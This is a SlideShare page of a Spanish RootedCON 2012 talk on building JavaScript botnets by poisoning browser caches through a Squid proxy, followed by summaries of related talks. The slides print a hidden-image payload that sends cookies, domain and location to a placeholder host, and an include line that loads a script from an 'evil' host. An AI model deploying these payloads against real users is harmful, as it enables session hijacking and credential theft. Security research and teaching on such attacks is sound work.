Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]

•Als PPTX, PDF herunterladen•

1 gefällt mir•1,782 views

En esta sesión se verá el funcionamiento de las javascript botnets, se analizarán entornos de despliegue y explotación, y acciones que pueden llevarse a cabo. Además, la sesión mostrará resultados de un estudio realizado a través de servidores proxy, nodos TOR y Rogue APs, que han permitido desplegar un sistema de prueba.

Technologie

Owning "bad" guys {and mafia}
with Javascript botnets
Chema Alonso & Manu “The Sur”

Man in the Middle
• Interceptación de comunicaciones entre
clientes y servidores
• Canal comprometido … p0wned seguro
• Red:
– ARP Spoofing
– Rogue DHCP(6)
– ICMPv6 Sppofing, SLAAC
• DNS Spoofing

Man in the Browser
• Plugins para interceptar navegación
– BHO
– Addons
• Acceso a todo el navegador
– Passwords
– Código
• Troyanos Bancarios
– “Tengo un ruso en mi IE”

JavaScript in the Middle
• Envenenamiento de la caché del navegador
• No es permanente:
– Si se borra la caché, se elimina la infección
• Todo archivo cacheado se usa si no ha expirado
• Permiten introducir código javascript remoto
• Acceso a:
– Cookies
• Salvo HTTPOnly (more or less)
– Código HTML
– Campos introducidos en formularios
– URL
– Ejecución de código remoto
– …

¿Cómo meterlo?
• XSS Permanentes
• Owneando HTTP Servers
• Ataques Man In the middle de red
• Ataques a memcache
• Imaginación….

- Framework para infectar la caché de navegadores
- Inyecta un javascript en cliente
- Ese javascript va incluyendo los mismos payloads
- http://beefproject.com
- Muy conocido

¿Cómo hacer una Botnet usando
Javascript?

Monta un Proxy con SQUID
GET / HTTP/1.1 GET / HTTP/1.1
Host: www.web.com Host: www.web.com

Response Response
Home.html Home.html
GET /a.jsp HTTP/1.1 GET /a.jsp HTTP/1.1
Host: www.web.com Host: www.web.com

Response
Response
a.Jsp + pasarela.js
a.jsp
include http://evil/payload.js

GET /payload.js HTTP/1.1
Host: evil

Configura squid y haz que no expiren
Squid.conf: Activar URL rewrite program

.htaccess: Que no expiren los objetos de Apache

Prepara Payloads: 1 robar cookies
document.write(“
<img id='domaingrabber'
src='http://X.X.X.X/panel/
domaingrabber.php?id=0.0.0.0&
domain="+document.domain+"&
location="+document.location+"&
cookie="+document.cookie+"'
style='display:none;'/>");

Ataque dirigido a sitios
• Selección objetivo
– Banco
– Red Social
– Intranet
• Analiza los js que carga
• Payload:
– Inclusión de payloads en cualquier página que
navegue.

Protecciones
• Cuidado con los mitm
– Proxy
– Redes TOR
• Política de
descontaminación
• Navega sin caché
• VPNs no son protección

¿Preguntas?

chema@informatica64.com
mfernandez@informatica64.com

Weitere ähnliche Inhalte

Andere mochten auch

Modulo 5

Cesar Zarate

Owning the bad guys

Santhosh Kumar

Owning bad guys {and mafia} with javascript botnets

Chema Alonso

La presentación tratará acerca del sistema de reputación IP, accesible de forma libre, desarrollado en Alienvault. Se explicará el funcionamiento de todas sus partes, lo que incluye sus fuentes de información, las metodologías de recopilación de datos y el procesado de los mismos. Se tratarán temas como análisis automatizado de malware, algoritmos para perfilar datos y evitar falsos positivos, la forma de recibir retroalimentación, el uso de recursos muy diferentes en el sistema, así como las dificultades que hemos tenido a la hora de desarrollarlo.

Guillermo Grande y Alberto Ortega - Building an IP reputation engine, trackin...

RootedCON

Pese a que la criptografía matemática es en general bastante segura en cuanto a algoritmia y protocolos, a la hora de realizar implementaciones prácticas es fácil subvertir esa seguridad inicial añadiendo vectores de ataque que permiten ‘explotar’ vulnerabilidades que pongan en peligro la seguridad. La charla versará sobre ejemplos prácticos de como atacar y sacar partido a herramientas criptográficas de amplio uso (SmartCards, certificados SSL, comunicaciones seguras, etc) Junto con la charla se presentará y liberará un ejemplo de ‘Troyano’ que ataca al DNI-E haciendo operaciones seguras de forma desatendida una vez robado el PIN 3. Relación de temas Problemas relacionados con gestión de certificados SSL (no verificabilidad, falsa sensación de seguridad, fallos en procesos de registro) Problemas relacionados con certificados en formato PKCS#12 Problemas relacionados con comunicaciones seguras cifradas (ataques MitM avanzados) Vectores prácticos de ataques a SmartCards (Dni-e)

Yago Jesús - Applied Cryptography FAILs [RootedCON 2012]

RootedCON

La ingeniería social es el arte de obtener información confidencial a través de la manipulación de la persona que tiene ese conocimiento. La base de esta técnica es que las personas siempre suelen ser el eslabón más débil en un sistema securizado, ya que normalmente siempre hay una persona que sabe cómo acceder a él. La idea es que es más fácil manipular a una persona que al sistema en sí mismo. La banca online no es una excepción. En este caso, las personas más vulnerables son los propios usuarios, los clientes finales de los bancos, y el objetivo es acceder a sus cuentas. Para ello se utilizan troyanos bancarios, pero no se deja de lado la ingeniería social, sino que ésta aparece en forma de inyecciones HTML o redirecciones a sitios de phishing, siendo las primeras las más sofisticadas. Es impresionante ver cómo cada vez que un banco añade una barrera de seguridad ésta se salta sin problemas gracias a la ingeniería social y a la ingenuidad de los usuarios. Por lo tanto, ¿sigue siendo rentable invertir en medidas de seguridad sabiendo que no podemos controlar a los usuarios?¿existe alguna contramedida contra la ingeniería social?

José Miguel Esparza y Mikel Gastesi - Social Engineering in Banking Trojans: ...

RootedCON

El objetivo de la presentación es el de transmitir al publico, de como funcionan las bandas criminales en internet desde un punto de vista técnico sin dejar de lado una pequeña introducción historica para los asistentes no familiarizados con el mundo del cibercrimen. Durante la presentación se hablara de los proveedores Offshore más activos e situado en Europa del este. Dicho ISP constituye uno de los recursos más activos del Crimeware mediante el cual se distribuyen una importante cantidad de códigos maliciosos, malware, crimepacks, botnets, iframers, tdsSystems y un largo ETC…. El indice de la presentación tendrá una estructura similar a la siguiente: Un poco de Historia (Breve introducción al cibercrimen) Infraestructura enumerando máquinas, dominios, etc? (Como tienen montado el chiringuito) Dibujo de la organización, responsabilidades…(Vamos a mostrar, nombres, responsabilidades,horarios de trabajo) Donde compran ellos su infraestructura (es realmente offshore??) (sacaremos algún leak que demuestra nuestras sospechas y se verán contrastadas nuestras suposiciones) ¿Que cuesta ser malo? (Kids Don’t do it!) (Cuanto invierte un malote) Donde venden y compran servicios. Servicios más relevantes que ofrecen, trafico, vps, vpn, marketplaces, mulas, etc.. (Cual es el éxito de su servicio) ‘lo prueban por su calidad y se quedan por el servicio técnico’ Análisis de los crimewares encontrados más relevantes y conocidos. Los clasicos Spyeye, Zevs, etc…. Análisis de los crimewares más raros y privados encontrados. (Bazar Bizarro) Conclusiones y agradecimientos. El contenido de la ponencia será completamente 100% real. se mantendrá la frescura de los datos en exclusiva para la la RootedCon, de está manera está presentación no se volverá a repetir en ningún congreso Por otro lado se sombrearan los datos que se considere que puedan perjudicar y causar un impacto negativo sobre los mismos. Toda la información que se cite durante la ponencia será con fines educacionales y a pesar de los títulos en ningún momento se incitara a cometer actos delictivos. Todos los datos adquiridos han sido fruto de colaboración empresas y autoridades que nos facilitan la publicación de los datos.

Manu Quintans y Frank Ruiz - All Your Crimeware Are Belong To Us! [RootedCON ...

RootedCON

¿Te crees que bastionando tu servidores estás seguro?, Tienes PKI, Certificados, SSL, e-DNI, IPSEC,mucha experiencia en seguridad, dispones de certificaciones y eres muy considerado en el sector, ¿pero? ¿le has preguntado a la secretaria de tu director? ¿sabes como y donde almacena las contraseñas tu director comercial? Hospital Central, pretende enseñar a los asistentes como se realizo una auditoría a un hospital utilizando mecanismos de ingeniería social y como se obtuvo el control del hospital en menos de 24 horas. Nada de exploits, nada de SQL Injection. Tan solo la utilización de técnicas y troyanos humanos.

Pedro Sánchez - Hospital Central. Historia de una extorsión [RootedCON 2012]

RootedCON

La ingeniería inversa y el análisis de seguridad de dispositivos hardware suele requerir herramientas especializadas que el usuario medio no tiene disponibles en casa. Durante esta charla presentaremos las herramientas y métodos básicos a utilizar durante el análisis de este tipo de productos, buscando introducir a los asistentes en el mundo del hardware hacking sin necesidad de emplear excesivos recursos. Se empezará desde la búsqueda de información inicial, el análisis de interfaces interesantes (RS232, i2c, USB, etc ), pasando por la obtención del firmware utilizado por el dispositivo y finalmente por la emulación yo debugging en tiempo real del código utilizado por el dispositivo via JTAG. Para cada uno de estos aspectos se realizarán demostraciones sobre hardware común (off-the-shelf).

Eloi Sanfélix y Javier Moreno - Hardware hacking on your couch [RootedCON 2012]

RootedCON

Desde hace tiempo se ha tendido a criminalizar algunas actividades relacionadas con el mundo de la seguridad informática creando nuevas leyes o endureciendo las existentes con el fin de ampliar el control sobre las comunicaciones y los usuarios. Teniendo en cuenta esta situación que ha sido agravada por las actuaciones de determinados colectivos; algunas practicas de la seguridad informática que antes podían justificarse como pura “”curiosidad”" se han convertido en un delito y pueden terminar en situaciones desagradables. La charla tratara sobre los métodos que podemos utilizar para evitar que nuestra curiosidad se vuelva contra nosotros y terminemos recibiendo alguna visita “”non grata”". Mostraremos técnicas para conseguir anonimato en Internet y evitar ser trazados, como utilizar “”otros”" sistemas sin que nadie se percate de nuestra presencia, etc… En resumen: como se podría “”curiosear”" sin terminar enjaulado. Todo esto se demostrara utilizando herramientas propias, parte de las cuales serán liberadas al público tras finalizar la conferencia.

Jaime Peñalba y Javier Rodríguez - Live Free or Die Hacking [RootedCON 2012]

RootedCON

El objetivo de la conferencia es exponer cómo se puede llevar a cabo, de forma lo más sencilla y estructurada posible, la coexistencia de diversos elementos cotidianos en las casas actuales, controlados por un único sistema, con la finalidad de mejorar la seguridad del lugar donde más tranquilos deberíamos estar: nuestra propia vivienda. Se explicará cómo diseñar un mecanismo de seguridad física casero basado en: Mecanismos de monitorización mediante cámaras web genéricas, con técnicas de reconocimiento facial de los habitantes de la casa, así como detección por bluetooth. Grabación de videos a sospechosos Interacción con una alarma controlable vía TCPIP Reconocimiento facial de personas clasificadas como “buscadas por las autoridades”, en modo lista negra, integrado con el aviso teléfonico a la policía mediante una centralita basada en VoIP, indicando la ubicación de qué persona de dicha lista, se encuentra en el domicilio. Sistema de notificaciones de las alertas a Twitter, correo y mensajería instantánea. Asimismo, se hablará de automatización de mecanismos de control de aire acondicionado/calefacción, robots dedicados a la limpieza y estaciones meteorológicas, demostrando que cualquier elemento casero con interfaz de red, puede ser un sistema SCADA. Además de implementar un sistema de autenticación biométrica, aprovechando el reconocimiento facial de quien entra en la casa, se podrá disponer de una lista blanca de usuarios, sobre los que poder personalizar un mensaje de bienvenida para cada usuario, pudiendo avisarle de diversos aspectos.

Lorenzo Martínez - Welcome to your secure /home, $user [Rooted CON 2012]

RootedCON

En los tiempos que corren, la asentada crisis, y los presupuestos cayendo en picado, arquitectos de sistemas, así como técnicos, se pueden ver en un aprieto, a la hora de necesitar realizar recogida de evidencias corporativas, en el caso de no poder contar con las herramientas adecuadas, por falta de presupuesto. En esta sesión, se aportará un enfoque práctico sobre este problema, incidiendo en presentar la arquitectura corporativa como una solución, más que un problema. Para ello, se aportarán ideas que permitan, por ejemplo, extraer datos en caliente de un equipo, o grupo de equipos, sin la tediosa tarea de realizar una imagen completa al mismo. Todo ello utilizando la infraestructura existente y sin necesidad de herramientas de terceros. También se presentarán ideas sobre cómo almacenar Logs de equipos críticos en BBDD, sin utilizar para ello aplicaciones residentes ni complejos proyectos. Toca remangarse y scriptar!!

Juan Garrido - Corporate Forensics: Saca partido a tu arquitectura[RootedCON ...

RootedCON

“DNS: Internet Dial-Tone”; Partiendo de esta premisa y con la vista puesta en el método de distribución de ‘malware’ presentado en 2011 (Cloud Malware Distribution), intentaremos mostrar de forma dinámica los resultados obtenidos después de algunos meses de trabajo focalizado en las comunicaciones, tanto en la parte de control como en la fuga de información, de las ‘botnets’. Por supuesto con el protocolo DNS con un papel protagonista. Jugaremos con tres parámetros fundamentales que tendremos que equilibrar: Nivel de exposición de la infraestructura del atacante. Recursos y complejidad. Ancho de banda en la comunicación. El objetivo final es concienciar de la importancia de poner el foco en este protocolo como se ha hecho en otros. Nuestros resultados, y los resultados obtenidos por proveedores de seguridad e investigadores en los últimos meses avalan la posición que defendemos.

Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]

RootedCON

Andere mochten auch (13)